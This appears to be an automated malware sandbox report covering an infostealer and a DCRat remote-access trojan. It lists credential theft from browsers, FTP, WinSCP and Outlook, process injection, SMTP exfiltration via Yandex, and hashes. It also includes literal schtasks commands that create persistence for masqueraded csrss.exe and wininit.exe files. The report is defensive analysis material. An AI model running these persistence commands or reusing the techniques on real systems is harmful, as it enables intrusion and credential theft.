| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
Files
memory/108-0-0x000007FEF65A3000-0x000007FEF65A4000-memory.dmp
memory/108-1-0x0000000001020000-0x0000000001060000-memory.dmp
memory/108-2-0x000007FEF65A0000-0x000007FEF6F8C000-memory.dmp
memory/2424-7-0x000007FEEDE3E000-0x000007FEEDE3F000-memory.dmp
memory/2424-8-0x000000001B1D0000-0x000000001B4B2000-memory.dmp
memory/2424-9-0x0000000002560000-0x0000000002568000-memory.dmp
memory/2424-10-0x000007FEEDB80000-0x000007FEEE51D000-memory.dmp
memory/2424-11-0x000007FEEDB80000-0x000007FEEE51D000-memory.dmp
memory/2424-13-0x000007FEEDB80000-0x000007FEEE51D000-memory.dmp
memory/2424-12-0x00000000026AB000-0x0000000002712000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e96770687ffc3c0dce62ec3838e9e016 |
| SHA1 | da5d6fd725ecf9f958a67ab6259e75983814b24d |
| SHA256 | ff70c9dc86025288062a5a7a71929ebae088b7c4c00206a45d5a2bf6489dc903 |
| SHA512 | 05d157644c26f408901fec012a89e911dde0d0987dbb432061a2f6b1480504ffd4403482b320312513eb3d87ce04632ef9a0db746e4807f1d5cb707b984d3408 |
memory/2888-19-0x000000001B210000-0x000000001B4F2000-memory.dmp
memory/2888-20-0x0000000002490000-0x0000000002498000-memory.dmp
memory/108-21-0x000007FEF65A3000-0x000007FEF65A4000-memory.dmp
memory/108-22-0x000007FEF65A0000-0x000007FEF6F8C000-memory.dmp
memory/2588-34-0x0000000001D70000-0x0000000001D78000-memory.dmp
memory/108-38-0x000007FEF65A0000-0x000007FEF6F8C000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20241010-en
Max time kernel
151s
Max time network
135s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Application = "C:\\Users\\Admin\\AppData\\Roaming\\app.exe" | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2620 set thread context of 2932 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
| PID 2620 set thread context of 1360 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe
"C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\My.RawFile.exe
"C:\Users\Admin\AppData\Roaming\My.RawFile.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | smtp.yandex.com | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 23.192.18.101:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.157:80 | crl.microsoft.com | tcp |
Files
memory/2808-0-0x0000000074441000-0x0000000074442000-memory.dmp
memory/2808-1-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2808-2-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2808-12-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2808-13-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2808-25-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2808-26-0x0000000074440000-0x00000000749EB000-memory.dmp
C:\Users\Admin\AppData\Roaming\app.exe
| MD5 | 97863757bcbb19ac4b85fdee34b532c2 |
| SHA1 | 546673271b915dec79834f35767c7045b5aaf6a2 |
| SHA256 | 05186a0de5bb7938a8b1f81f215abcec797e51d48f92979b1ae5ab57d1683ec6 |
| SHA512 | 419ab1c94e00e5d278d86513d7d47c61b3b7ee7647bf4bad1e9a5baa34c7730f57210dda360ed202de7644e52ac088409592c22f369ce0aad5e624a1d0d9df77 |
memory/2620-34-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2808-33-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2620-35-0x0000000074440000-0x00000000749EB000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1e6c0b679f03b895ccda4c16b8656cfe |
| SHA1 | b72a2f6e91da319a7c9970dfcef142129464414b |
| SHA256 | 16d04037d5b8e15ada46b2cc936aacb94a6739732c36ce390f0a4f2dcd456270 |
| SHA512 | a49319824c6c3e969cf25be963764363dbad6ca4da56baafb8867784f5c701a16f383aefedd6aa543b35979d2b5c9ae4e409e801b65a643bbb3f26b9aae8eaf1 |
C:\Users\Admin\AppData\Local\Temp\Cab3B0D.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2620-44-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2620-45-0x0000000074440000-0x00000000749EB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar4A3B.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
\Users\Admin\AppData\Roaming\My.RawFile.exe
| MD5 | 5a733ef0de5e31e2e4b4abb016c0f251 |
| SHA1 | 28644040a6deac35c20fa931b5d003a97293363e |
| SHA256 | a80c77ca694eca3f6629c54572aba811e64b61975c5db2ff38c8d662d12b1ce7 |
| SHA512 | 9d09ac6b6a560643cac08345ab6ef8578011b11be7d4821d7aa1b3d76f2801d30cb4d206a4ff9335f0ece5cfa2ec8258754b2481102eac3da064e5005f7ffba9 |
memory/2620-67-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2932-79-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2932-78-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2932-77-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2932-76-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2932-74-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2932-72-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2932-70-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2932-68-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2620-92-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2620-95-0x0000000074440000-0x00000000749EB000-memory.dmp
memory/2620-96-0x0000000074440000-0x00000000749EB000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
150s
Max time network
142s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Application = "C:\\Users\\Admin\\AppData\\Roaming\\app.exe" | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4860 set thread context of 3660 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
| PID 4860 set thread context of 2696 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe
"C:\Users\Admin\AppData\Local\Temp\196a171e0e93d86ea0a2e62e57df3214202969dfdc4a3d635f228fe0a53565b9.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\My.RawFile.exe
"C:\Users\Admin\AppData\Roaming\My.RawFile.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | smtp.yandex.com | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/5724-0-0x0000000074BA2000-0x0000000074BA3000-memory.dmp
memory/5724-1-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/5724-2-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/5724-3-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/5724-4-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/5724-16-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/5724-17-0x0000000074BA2000-0x0000000074BA3000-memory.dmp
memory/5724-18-0x0000000074BA0000-0x0000000075151000-memory.dmp
C:\Users\Admin\AppData\Roaming\app.exe
| MD5 | c5de36531a3c4a3a1d9098ac862e5214 |
| SHA1 | 648231e5533d7ce188ff90a9c851fd2f22a73930 |
| SHA256 | 20083eeac2dc9fbeadca54a8a1f74c44336baacdd1d7ccb06836ec1946cd9857 |
| SHA512 | 2beb218cac41a38f912858d60398b1597c705942c7aa33f98aff4cdbc1788a5a915eeb543ce775f39d8e5847ba829bb48779431ff6a69b092df445e5492504e5 |
memory/5724-29-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4860-30-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4860-31-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4860-33-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4860-32-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4712-35-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4712-36-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4860-38-0x0000000074BA0000-0x0000000075151000-memory.dmp
C:\Users\Admin\AppData\Roaming\My.RawFile.exe
| MD5 | 5a733ef0de5e31e2e4b4abb016c0f251 |
| SHA1 | 28644040a6deac35c20fa931b5d003a97293363e |
| SHA256 | a80c77ca694eca3f6629c54572aba811e64b61975c5db2ff38c8d662d12b1ce7 |
| SHA512 | 9d09ac6b6a560643cac08345ab6ef8578011b11be7d4821d7aa1b3d76f2801d30cb4d206a4ff9335f0ece5cfa2ec8258754b2481102eac3da064e5005f7ffba9 |
memory/3660-52-0x0000000000400000-0x0000000000410000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\aspnet_compiler.exe.log
| MD5 | b3ac9d09e3a47d5fd00c37e075a70ecb |
| SHA1 | ad14e6d0e07b00bd10d77a06d68841b20675680b |
| SHA256 | 7a23c6e7ccd8811ecdf038d3a89d5c7d68ed37324bae2d4954125d9128fa9432 |
| SHA512 | 09b609ee1061205aa45b3c954efc6c1a03c8fd6b3011ff88cf2c060e19b1d7fd51ee0cb9d02a39310125f3a66aa0146261bdee3d804f472034df711bc942e316 |
memory/4860-57-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4860-60-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4712-61-0x0000000074BA0000-0x0000000075151000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
148s
Max time network
154s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ja-JP\winlogon.exe | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File created | C:\Windows\ja-JP\cc11b995f2a76d | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File created | C:\Windows\ja-JP\winlogon.exe | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe
"C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
